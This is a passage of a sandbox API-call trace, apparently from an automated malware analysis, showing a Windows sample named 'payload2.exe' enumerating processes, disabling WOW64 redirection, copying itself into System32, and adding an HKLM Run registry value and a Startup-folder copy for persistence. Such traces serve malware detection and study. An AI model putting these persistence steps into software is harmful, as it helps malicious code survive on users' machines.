dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.529] lstrlenW (lpString="svchost.exe") returned 11 [0033.529] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.530] lstrlenW (lpString="svchost.exe") returned 11 [0033.530] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0033.530] lstrlenW (lpString="dwm.exe") returned 7 [0033.531] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0033.531] lstrlenW (lpString="explorer.exe") returned 12 [0033.531] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0033.532] lstrlenW (lpString="spoolsv.exe") returned 11 [0033.532] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0033.532] lstrlenW (lpString="taskhost.exe") returned 12 [0033.532] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.533] lstrlenW (lpString="svchost.exe") returned 11 [0033.533] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0033.534] lstrlenW (lpString="taskeng.exe") returned 11 [0033.534] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0033.534] lstrlenW (lpString="taskhost.exe") returned 12 [0033.534] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0033.535] lstrlenW (lpString="challenging.exe") returned 15 [0033.535] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0033.535] lstrlenW (lpString="pgp prix.exe") returned 12 [0033.535] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0033.536] lstrlenW (lpString="user-reno.exe") returned 13 [0033.536] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0033.536] lstrlenW (lpString="aggregate.exe") returned 13 [0033.536] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0033.537] lstrlenW (lpString="dressed.exe") returned 11 [0033.537] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0033.537] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0033.537] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0033.538] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0033.538] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0033.539] lstrlenW (lpString="developing.exe") returned 14 [0033.539] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0033.539] lstrlenW (lpString="supported.exe") returned 13 [0033.539] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0033.540] lstrlenW (lpString="girlstionselect.exe") returned 19 [0033.540] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0033.540] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0033.540] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0033.541] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0033.541] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0033.541] lstrlenW (lpString="eating.exe") returned 10 [0033.541] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0033.542] lstrlenW (lpString="nh_protected.exe") returned 16 [0033.542] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0033.542] lstrlenW (lpString="vulnerability.exe") returned 17 [0033.543] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0033.543] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0033.543] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0033.544] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0033.544] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0033.544] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0033.544] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0033.545] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0033.545] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0033.545] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0033.545] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0033.546] lstrlenW (lpString="dllhost.exe") returned 11 [0033.546] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0033.546] lstrlenW (lpString="dllhost.exe") returned 11 [0033.546] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0033.547] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0033.547] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 0 [0033.547] CloseHandle (hObject=0xe0) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6353e8 | out: hHeap=0x600000) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635430 | out: hHeap=0x600000) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635478 | out: hHeap=0x600000) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635498 | out: hHeap=0x600000) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6354e0 | out: hHeap=0x600000) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x634b80 | out: hHeap=0x600000) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614898 | out: hHeap=0x600000) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6148d0 | out: hHeap=0x600000) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6144c8 | out: hHeap=0x600000) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6144f0 | out: hHeap=0x600000) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614918 | out: hHeap=0x600000) returned 1 [0033.548] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614518 | out: hHeap=0x600000) returned 1 [0033.548] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x63b5a8 [0033.548] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x64b5b0 [0033.549] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.549] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b80, Size=0x20) returned 0x614518 [0033.549] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x614518, Size=0x40) returned 0x636b28 [0033.549] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.549] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b80, Size=0x20) returned 0x614518 [0033.549] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.549] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b80, Size=0x20) returned 0x6144f0 [0033.549] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.549] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b80, Size=0x20) returned 0x6144c8 [0033.549] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6144c8, Size=0x40) returned 0x636b70 [0033.549] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x64b5b0, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 0x67 [0033.549] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x65b5b8 [0033.549] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x66b5c0 [0033.550] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.550] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b80, Size=0x20) returned 0x6144c8 [0033.550] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6144c8, Size=0x40) returned 0x636bb8 [0033.550] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636bb8, Size=0x80) returned 0x6353e8 [0033.550] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6353e8, Size=0x100) returned 0x637d30 [0033.550] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0033.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x637d30 | out: hHeap=0x600000) returned 1 [0033.550] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe", lpDst=0x65b5b8, nSize=0x7fff | out: lpDst="C:\\Windows\\System32\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 0x56 [0033.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x66b5c0 | out: hHeap=0x600000) returned 1 [0033.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65b5b8 | out: hHeap=0x600000) returned 1 [0033.550] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x100000) returned 0x2060020 [0033.550] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.550] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b80, Size=0x20) returned 0x6144c8 [0033.550] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.550] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b80, Size=0x20) returned 0x635ab0 [0033.550] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.550] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.550] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x0) returned 1 [0033.550] lstrlenW (lpString="kernel32.dll") returned 12 [0033.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6144c8 | out: hHeap=0x600000) returned 1 [0033.550] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ab0 | out: hHeap=0x600000) returned 1 [0033.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0033.551] CreateFileW (lpFileName="C:\\Windows\\System32\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe" (normalized: "c:\\windows\\system32\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0033.553] ReadFile (in: hFile=0xe0, lpBuffer=0x2060020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2060020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0033.566] WriteFile (in: hFile=0xe4, lpBuffer=0x2060020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2060020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0033.568] ReadFile (in: hFile=0xe0, lpBuffer=0x2060020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2060020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0033.568] CloseHandle (hObject=0xe4) returned 1 [0033.569] CloseHandle (hObject=0xe0) returned 1 [0033.570] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.570] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b80, Size=0x20) returned 0x635ab0 [0033.570] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.570] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b80, Size=0x20) returned 0x635a60 [0033.570] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.570] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.570] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0033.570] lstrlenW (lpString="kernel32.dll") returned 12 [0033.570] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635a60 | out: hHeap=0x600000) returned 1 [0033.570] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.570] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x635ab0 | out: hHeap=0x600000) returned 1 [0033.570] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x2060020 | out: hHeap=0x600000) returned 1 [0033.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.575] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b80, Size=0x20) returned 0x635ab0 [0033.575] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635ab0, Size=0x40) returned 0x636bb8 [0033.575] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636bb8, Size=0x80) returned 0x65b5d0 [0033.575] lstrlenW (lpString="C:\\Windows\\System32\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 85 [0033.575] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0033.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x5c) returned 0x6353e8 [0033.575] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fd6c | out: phkResult=0x18fd6c*=0xe0) returned 0x0 [0033.575] RegSetValueExW (in: hKey=0xe0, lpValueName="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\System32\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe", cbData=0xaa | out: lpData="C:\\Windows\\System32\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 0x0 [0033.575] RegCloseKey (hKey=0xe0) returned 0x0 [0033.575] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6353e8 | out: hHeap=0x600000) returned 1 [0033.575] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0033.575] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65b5d0 | out: hHeap=0x600000) returned 1 [0033.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x65d5b8 [0033.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x66d5c0 [0033.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634b80 [0033.576] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634b80, Size=0x20) returned 0x635ab0 [0033.576] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x635ab0, Size=0x40) returned 0x636bb8 [0033.576] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x636bb8, Size=0x80) returned 0x65b5d0 [0033.576] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x65b5d0, Size=0x100) returned 0x637d30 [0033.576] lstrlenW (lpString="") returned 0 [0033.576] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0033.576] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8c) returned 0x637e38 [0033.576] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe0) returned 0x0 [0033.576] RegQueryValueExW (in: hKey=0xe0, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x66d5c0, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x0, lpData=0x66d5c0*=0x53, lpcbData=0x18fd50*=0x7fff) returned 0x2 [0033.576] RegCloseKey (hKey=0xe0) returned 0x0 [0033.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x637e38 | out: hHeap=0x600000) returned 1 [0033.576] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0033.576] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8c) returned 0x637e38 [0033.576] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0033.576] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x66d5c0, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x98) returned 0x0 [0033.576] RegCloseKey (hKey=0xe4) returned 0x0 [0033.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x637e38 | out: hHeap=0x600000) returned 1 [0033.576] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0033.576] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0033.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x637d30 | out: hHeap=0x600000) returned 1 [0033.576] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe", lpDst=0x65d5b8, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 0x9e [0033.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x66d5c0 | out: hHeap=0x600000) returned 1 [0033.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x65d5b8 | out: hHeap=0x600000) returned 1 [0033.576] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x100000) returned 0x2060020 [0033.577] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.577] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x635ab0 [0033.577] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x634bb0 [0033.577] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x634bb0, Size=0x20) returned 0x635a60 [0033.577] GetModuleHandleW 